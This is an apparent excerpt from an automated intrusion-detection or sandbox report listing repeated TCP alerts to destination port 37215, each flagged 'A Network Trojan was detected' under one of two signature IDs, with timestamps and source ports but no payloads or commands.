                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382668
                SID:2835222
                Source Port:34070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932681
                SID:2829579
                Source Port:46258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702259
                SID:2829579
                Source Port:44780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624946
                SID:2829579
                Source Port:49790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148814
                SID:2835222
                Source Port:44986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.079028
                SID:2829579
                Source Port:60134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052120
                SID:2829579
                Source Port:52836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762396
                SID:2829579
                Source Port:41096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132557
                SID:2835222
                Source Port:57892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734938
                SID:2835222
                Source Port:53422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762380
                SID:2829579
                Source Port:48382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716837
                SID:2829579
                Source Port:34628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291722
                SID:2829579
                Source Port:35034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968781
                SID:2835222
                Source Port:44928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615962
                SID:2835222
                Source Port:43108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940561
                SID:2835222
                Source Port:49386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569229
                SID:2835222
                Source Port:46314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789458
                SID:2835222
                Source Port:50524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024526
                SID:2835222
                Source Port:56640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917438
                SID:2835222
                Source Port:59716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790702
                SID:2829579
                Source Port:54766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504570
                SID:2835222
                Source Port:49380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072997
                SID:2835222
                Source Port:36490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777158
                SID:2829579
                Source Port:33382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879972
                SID:2829579
                Source Port:59960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324119
                SID:2829579
                Source Port:51480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472697
                SID:2829579
                Source Port:33108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275405
                SID:2829579
                Source Port:54340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326450
                SID:2835222
                Source Port:34742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644442
                SID:2835222
                Source Port:54446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230141
                SID:2829579
                Source Port:45814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381385
                SID:2835222
                Source Port:37614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384278
                SID:2829579
                Source Port:48728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807926
                SID:2829579
                Source Port:55078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.580803
                SID:2829579
                Source Port:42932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662859
                SID:2835222
                Source Port:58632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181397
                SID:2835222
                Source Port:45128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682748
                SID:2835222
                Source Port:53496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325059
                SID:2829579
                Source Port:40454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092872
                SID:2835222
                Source Port:46256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202275
                SID:2835222
                Source Port:48734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969071
                SID:2829579
                Source Port:46550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014229
                SID:2829579
                Source Port:47548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759524
                SID:2829579
                Source Port:34846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968454
                SID:2835222
                Source Port:50154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289753
                SID:2835222
                Source Port:38052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761645
                SID:2829579
                Source Port:47088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907137
                SID:2829579
                Source Port:44580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.778331
                SID:2835222
                Source Port:60848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968480
                SID:2835222
                Source Port:47370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670472
                SID:2829579
                Source Port:57512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.566409
                SID:2835222
                Source Port:60600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177813
                SID:2829579
                Source Port:49964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384441
                SID:2829579
                Source Port:42814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024217
                SID:2835222
                Source Port:52766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.910512
                SID:2829579
                Source Port:55562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163692
                SID:2829579
                Source Port:38504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941538
                SID:2835222
                Source Port:60182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132836
                SID:2829579
                Source Port:48556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201533
                SID:2829579
                Source Port:42982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074762
                SID:2829579
                Source Port:38696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253873
                SID:2829579
                Source Port:57630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.404738
                SID:2829579
                Source Port:54354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858558
                SID:2835222
                Source Port:52588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861561
                SID:2829579
                Source Port:44578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.990060
                SID:2835222
                Source Port:36628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915745
                SID:2829579
                Source Port:35154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663829
                SID:2835222
                Source Port:52978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381791
                SID:2829579
                Source Port:55762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202370
                SID:2829579
                Source Port:56260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078592
                SID:2829579
                Source Port:37388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860883
                SID:2829579
                Source Port:53238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779137
                SID:2835222
                Source Port:36556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660897
                SID:2829579
                Source Port:34334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520285
                SID:2829579
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012895
                SID:2835222
                Source Port:42240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274168
                SID:2829579
                Source Port:49034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881088
                SID:2835222
                Source Port:33956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181529
                SID:2829579
                Source Port:33946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451714
                SID:2835222
                Source Port:60484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.970924
                SID:2835222
                Source Port:60320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227184
                SID:2829579
                Source Port:42002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017719
                SID:2835222
                Source Port:51000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410258
                SID:2835222
                Source Port:33184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542836
                SID:2835222
                Source Port:43186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.896328
                SID:2835222
                Source Port:42030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669211
                SID:2829579
                Source Port:42696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941743
                SID:2829579
                Source Port:37814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808834
                SID:2835222
                Source Port:37760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967603
                SID:2829579
                Source Port:50018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978113
                SID:2829579
                Source Port:57196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942355
                SID:2829579
                Source Port:54118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734301
                SID:2835222
                Source Port:45140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718049
                SID:2835222
                Source Port:44322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517263
                SID:2829579
                Source Port:37132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688883
                SID:2835222
                Source Port:33092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203146
                SID:2829579
                Source Port:46864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681549
                SID:2829579
                Source Port:36054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766314
                SID:2835222
                Source Port:43126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367058
                SID:2835222
                Source Port:52412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640453
                SID:2835222
                Source Port:35270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677158
                SID:2835222
                Source Port:39184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423723
                SID:2835222
                Source Port:35500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675772
                SID:2835222
                Source Port:54048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325582
                SID:2829579
                Source Port:52512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339034
                SID:2835222
                Source Port:38902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645354
                SID:2835222
                Source Port:40646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133655
                SID:2835222
                Source Port:60450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452242
                SID:2829579
                Source Port:46050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406537
                SID:2835222
                Source Port:43226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.028013
                SID:2835222
                Source Port:34142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084698
                SID:2829579
                Source Port:59086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149252
                SID:2829579
                Source Port:38604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182033
                SID:2835222
                Source Port:35904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761743
                SID:2835222
                Source Port:49442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518773
                SID:2829579
                Source Port:43824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321197
                SID:2829579
                Source Port:44192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569524
                SID:2829579
                Source Port:43066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972151
                SID:2835222
                Source Port:41878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734996
                SID:2829579
                Source Port:48212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470931
                SID:2835222
                Source Port:44880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022456
                SID:2835222
                Source Port:53016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676103
                SID:2835222
                Source Port:59352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277939
                SID:2829579
                Source Port:60318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322943
                SID:2835222
                Source Port:54892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644139
                SID:2829579
                Source Port:43604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761950
                SID:2829579
                Source Port:40702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018274
                SID:2835222
                Source Port:36406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505163
                SID:2829579
                Source Port:38426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661523
                SID:2829579
                Source Port:54966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687257
                SID:2835222
                Source Port:47504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001653
                SID:2829579
                Source Port:52596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776945
                SID:2835222
                Source Port:56666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277463
                SID:2829579
                Source Port:41652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368343
                SID:2829579
                Source Port:52944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149822
                SID:2829579
                Source Port:49574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419531
                SID:2829579
                Source Port:36756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088657
                SID:2835222
                Source Port:41604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343565
                SID:2835222
                Source Port:58324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916017
                SID:2835222
                Source Port:55906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544317
                SID:2829579
                Source Port:57886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421875
                SID:2835222
                Source Port:58446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293709
                SID:2829579
                Source Port:50898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182228
                SID:2829579
                Source Port:46006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618104
                SID:2829579
                Source Port:41580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520344
                SID:2835222
                Source Port:40368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469865
                SID:2835222
                Source Port:35874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881625
                SID:2835222
                Source Port:38402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727963
                SID:2835222
                Source Port:40228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661880
                SID:2835222
                Source Port:51424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179684
                SID:2829579
                Source Port:47348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159957
                SID:2829579
                Source Port:46182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792777
                SID:2829579
                Source Port:45454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.910587
                SID:2829579
                Source Port:55066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984682
                SID:2835222
                Source Port:60788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.151533
                SID:2829579
                Source Port:51692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805967
                SID:2835222
                Source Port:60092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882201
                SID:2829579
                Source Port:48454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917467
                SID:2829579
                Source Port:43154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812099
                SID:2835222
                Source Port:52968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968926
                SID:2829579
                Source Port:60008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159290
                SID:2829579
                Source Port:46212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423682
                SID:2829579
                Source Port:46916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291701
                SID:2829579
                Source Port:49698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980180
                SID:2829579
                Source Port:43274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021720
                SID:2829579
                Source Port:46566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.031208
                SID:2829579
                Source Port:33536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293748
                SID:2829579
                Source Port:54414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013445
                SID:2835222
                Source Port:38284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672146
                SID:2835222
                Source Port:44324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.968864
                SID:2835222
                Source Port:59832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850643
                SID:2835222
                Source Port:49970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071204
                SID:2829579
                Source Port:50974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227238
                SID:2829579
                Source Port:42880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791204
                SID:2829579
                Source Port:46508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761552
                SID:2835222
                Source Port:54030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542634
                SID:2829579
                Source Port:44270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861712
                SID:2835222
                Source Port:38150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165160
                SID:2829579
                Source Port:53160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148717
                SID:2829579
                Source Port:57018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762619
                SID:2835222
                Source Port:58688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182427
                SID:2835222
                Source Port:56144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722507
                SID:2829579
                Source Port:34542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159906
                SID:2835222
                Source Port:50938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382051
                SID:2829579
                Source Port:33818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734915
                SID:2829579
                Source Port:56272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.718571
                SID:2829579
                Source Port:43798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472883
                SID:2835222
                Source Port:49716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094290
                SID:2835222
                Source Port:51994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276723
                SID:2829579
                Source Port:52472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828866
                SID:2829579
                Source Port:38956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115019
                SID:2835222
                Source Port:43174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718465
                SID:2835222
                Source Port:33860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054893
                SID:2829579
                Source Port:35918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111878
                SID:2835222
                Source Port:33568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625432
                SID:2829579
                Source Port:49066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367363
                SID:2829579
                Source Port:57462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
